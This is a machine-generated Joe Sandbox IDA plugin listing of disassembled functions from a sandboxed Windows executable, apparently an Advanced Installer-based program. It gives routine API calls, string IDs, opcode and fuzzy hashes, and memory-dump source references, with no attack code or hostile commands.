                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$DeleteInit_thread_footer_wcsrchr$CreateHeapProcessRead
                                                                                                                                                                                                                                                                          • String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
                                                                                                                                                                                                                                                                          • API String ID: 1643751158-3685554107
                                                                                                                                                                                                                                                                          • Opcode ID: 614ab15e4256757dfb71bb29a80a0d9801f0d57949aa80abad6d4a1bfce1230a
                                                                                                                                                                                                                                                                          • Instruction ID: 7e3232f27e2db7ea4e9d7c48e2e022bc1692751b6b61d6c1c65d119df9cf1842
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 614ab15e4256757dfb71bb29a80a0d9801f0d57949aa80abad6d4a1bfce1230a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C091C331A0050A9FDB00DF68CC44BAEFBB5EF55325F1482A9E515DB292DB31DD14CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 001B8945
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 001B89BF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                          • String ID: </a>$<a href="$<a>
                                                                                                                                                                                                                                                                          • API String ID: 1385522511-4210067781
                                                                                                                                                                                                                                                                          • Opcode ID: 2b6ed7783bc8eeda28f3cd7594687ad47477dae0c454694361e61fefd7d199fe
                                                                                                                                                                                                                                                                          • Instruction ID: 0068be67812d82fdbcf3520fa4a6b8afb3345a4b2e5e5b9735c79dd066b0e982
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b6ed7783bc8eeda28f3cd7594687ad47477dae0c454694361e61fefd7d199fe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7A1CE70A00308EFCB14DF68D855BADB7B5FF49714F204269E815AB3D2EB34A944CB94
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0020D43C
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                                                                                          • String ID: 8Y>$AI_HIDE_CAPTION_ICON_AND_TEXT$AI_HIDE_CAPTION_ICON_AND_TEXT_ALL$h]4
                                                                                                                                                                                                                                                                          • API String ID: 2882836952-1399895918
                                                                                                                                                                                                                                                                          • Opcode ID: 4a09e66d73fb64cb563321f9523bacfd0bdf231a37207b464a94535e580ea68e
                                                                                                                                                                                                                                                                          • Instruction ID: 55f8ae72717159801a0611f138c36421da25dad882e0ba92a643c2d12cd9609f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a09e66d73fb64cb563321f9523bacfd0bdf231a37207b464a94535e580ea68e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B781A071A11208DFCF05EFA8C995BEDBBB5AF54300F1441A8E805AB293DB74AE44CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 002B7897
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 002B78B3
                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(00000000,003AEFA7), ref: 002B78C4
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 002B78D2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                                                                                                                                                                                          • String ID: open
                                                                                                                                                                                                                                                                          • API String ID: 2321548817-2758837156
                                                                                                                                                                                                                                                                          • Opcode ID: 3aaa3979612c294e354fc6fd77319b518354e8ed695718838b3b339451fca078
                                                                                                                                                                                                                                                                          • Instruction ID: a99b801b50f27cc060a3e2490f1a7b3cdc9ede303bc27fa47a0ccc7e5bcc64ff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aaa3979612c294e354fc6fd77319b518354e8ed695718838b3b339451fca078
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6616B71E146499BDB10CFA9C84879EBBB4FF85364F184269E824AB3D1D7749900DB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 001E8407
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001E8452
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001E8489
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseCurrentErrorHandleLastProcess
                                                                                                                                                                                                                                                                          • String ID: SeShutdownPrivilege$t=
                                                                                                                                                                                                                                                                          • API String ID: 1009092642-4076881080
                                                                                                                                                                                                                                                                          • Opcode ID: f3fa1200dc71cac8abca9acada2de66d7a87eb6757389ec7ffd31e5266928b9d
                                                                                                                                                                                                                                                                          • Instruction ID: 6d738142aba2f6cf436ecd65d5bfacc49c6d2f996e043ae316d82d4118c11feb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3fa1200dc71cac8abca9acada2de66d7a87eb6757389ec7ffd31e5266928b9d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84215771A40209EFEB10DFA1CD49BEEBBF8FB08715F144129E915B62D0DB75A904CB28
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,6A5719DA,00000000,?,00000001,00000000,?,6A571A51,00000001,FlsFree,6A5A25FC,FlsFree,00000000), ref: 6A5719A8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                                                          • Opcode ID: febcd82a45f12c65f5a444f944e218246724fa12598379820bdc7a09f338e8af
                                                                                                                                                                                                                                                                          • Instruction ID: f87c0172967748f205a3a8f32cc3a237f5dbcdba6a19014c4340521fbbd45e52
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: febcd82a45f12c65f5a444f944e218246724fa12598379820bdc7a09f338e8af
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D11E371B40621ABCB32CA698854B4D77A4BF027A0F160121EA55FB290DF70ED0287F2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,0034E10F,?,?,00000000,?,?,0034E1C1,00000002,FlsGetValue,003CE140,003CE148), ref: 0034E0DD
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                                                          • Opcode ID: b2ef0c24f1df57264b1c22638b9cb8657cceb196c2f48ae49070002b339a5263
                                                                                                                                                                                                                                                                          • Instruction ID: c5ba350f6d635c10eade71c2e8421dfa89f666c8f3e38c9647082fc3cc2b89ef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2ef0c24f1df57264b1c22638b9cb8657cceb196c2f48ae49070002b339a5263
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80117331A41231ABDB238B6AAC41B5D37D8AF01760F260521F929EF280D6B0FD0087D6
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AA831995,00000001,?,00000000,6A59F614,000000FF,?,6A57A8FE,?,?,6A57A8D2,00000016), ref: 6A57A9A3
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6A57A9B5
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,6A59F614,000000FF,?,6A57A8FE,?,?,6A57A8D2,00000016), ref: 6A57A9D7
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                          • Opcode ID: 296fcc1a35a06ed5838a1f00aeace9c010c77ab5ed3eb66ce68a81211c8516ed
                                                                                                                                                                                                                                                                          • Instruction ID: 3f31f90ccf25682fce1eb09d267fcc2ce332fb693fc12fc6bb997da21824f2a4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 296fcc1a35a06ed5838a1f00aeace9c010c77ab5ed3eb66ce68a81211c8516ed
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B014F75A00559EBDF11CB90CC04FAEBBF9FB05651F02452AFA22E2690DF75D900CAA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DF534560,?,?,00000000,003CA4FA,000000FF,?,0035EA13,?,?,0035E9E7,?), ref: 0035EAB8
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0035EACA
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,003CA4FA,000000FF,?,0035EA13,?,?,0035E9E7,?), ref: 0035EAEC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                          • Opcode ID: 6c123f4f5efa36286a737e72d71d991c51bb1959e1518519b3f4299811cabc91
                                                                                                                                                                                                                                                                          • Instruction ID: b8fd1a70ad87edcc1a6c31eb31dc154e35d57aa2cb09c3e6ebb76679a122faef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c123f4f5efa36286a737e72d71d991c51bb1959e1518519b3f4299811cabc91
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7016236950669EBDB179F94DC09FAEBBBCFB04B15F004625F811E26A0DB749A04CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: EnterCriticalSection.KERNEL32(00459EA0,-00000010,?,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?), ref: 0034984D
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?,?,00000008), ref: 0034988A
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 002BE1BE
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 002BE1C5
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 002BE1DC
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: EnterCriticalSection.KERNEL32(00459EA0,?,?,001B9F37,0045AAD4,003CA720), ref: 00349802
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9F37,0045AAD4,003CA720), ref: 00349835
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: RtlWakeAllConditionVariable.NTDLL ref: 003498AC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AddressConditionInit_thread_footerLibraryLoadProcVariableWake
                                                                                                                                                                                                                                                                          • String ID: Dbghelp.dll$SymFromAddr
                                                                                                                                                                                                                                                                          • API String ID: 3268644551-642441706
                                                                                                                                                                                                                                                                          • Opcode ID: f56a19e33f409663bd3e67191a3e1da340ba4c285aa0dc0cfeab5c75e9888433
                                                                                                                                                                                                                                                                          • Instruction ID: 874afd2a26e4c7821dfac8b01de24ffb12a85a690801f4881e028032b4e40a18
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f56a19e33f409663bd3e67191a3e1da340ba4c285aa0dc0cfeab5c75e9888433
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C015EB1A44744DBCB11DF58DC45B89B7A4F708721F10023AF82A97BD5D7B5B900CB45
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?), ref: 00221EFB
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00221F01
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?), ref: 00221FD0
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00221FD6
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                          • String ID: Lt=
                                                                                                                                                                                                                                                                          • API String ID: 3859560861-2516213077
                                                                                                                                                                                                                                                                          • Opcode ID: 2892cb6645dd884e94e4ff58a9fa87e1c4980ae9d90c81d60d56bf1978edf540
                                                                                                                                                                                                                                                                          • Instruction ID: 3aaf37e180a6e9b6e1faf52ed9198a5b3f8e95e099b10943b676d23e9694bad4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2892cb6645dd884e94e4ff58a9fa87e1c4980ae9d90c81d60d56bf1978edf540
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3D17B30D10318EFDB14DFA8C954BEEBBB5BF64304F244169D405AB292DB74AE19CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000), ref: 001E903B
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 001E9041
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000), ref: 001E90BA
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 001E90C0
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 001E9298
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess$Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                          • String ID: v=$Lt=$Lt=$t=
                                                                                                                                                                                                                                                                          • API String ID: 3488363583-1593079143
                                                                                                                                                                                                                                                                          • Opcode ID: 9c4c77bad18fdf6f100517175c74f6e43d1c888c5aa88c420cd091d3aca47694
                                                                                                                                                                                                                                                                          • Instruction ID: 72c0472e68d51a1dda17b5e9d98544f21868322e53f3ea4e3794da3068c7f506
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c4c77bad18fdf6f100517175c74f6e43d1c888c5aa88c420cd091d3aca47694
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47B16D70D00759EFDB15CFA9C845BEEBBB8BF45704F248199F415AB281DB74AA04CBA0
